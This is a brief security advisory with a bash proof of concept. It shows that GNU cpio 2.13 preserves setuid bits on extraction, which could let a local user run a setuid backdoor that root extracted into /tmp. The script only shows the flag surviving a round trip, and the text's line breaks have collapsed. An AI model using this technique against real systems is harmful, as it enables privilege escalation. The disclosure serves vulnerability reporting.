cpio 2.13 Privilege Escalation

cpio privilege escalation vulnerability via setuid files in cpio archiveHappy New Year, let in 2024 happiness be with you! :)When extracting archives cpio (at least version 2.13) preservesthe setuid flag, which might lead to privilege escalation.One example is r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00rwithout further interaction from root.We believe this is vulnerability, since directory traversal in cpiois considered vulnerability.The POC is trivial, including bash script.<pre>====#!/bin/bash# cpio privilege escalation via setuid files in cpio archive# author: Georgi Guninski# date: Mon Jan  8 07:28:28 AM UTC 2024# tested on cpio (GNU cpio) 2.13mkdir -p /tmp/1cd /tmp/1touch achmod 4555 aecho -n a | cpio -ocv0  > a.cpiomkdir -p /tmp/2cd /tmp/2cpio -iv < ../1/a.cpiols -lh /tmp/2/a#-r-sr-xr-x. 1 joro joro 0 Jan  8 09:10 /tmp/2/a====</pre>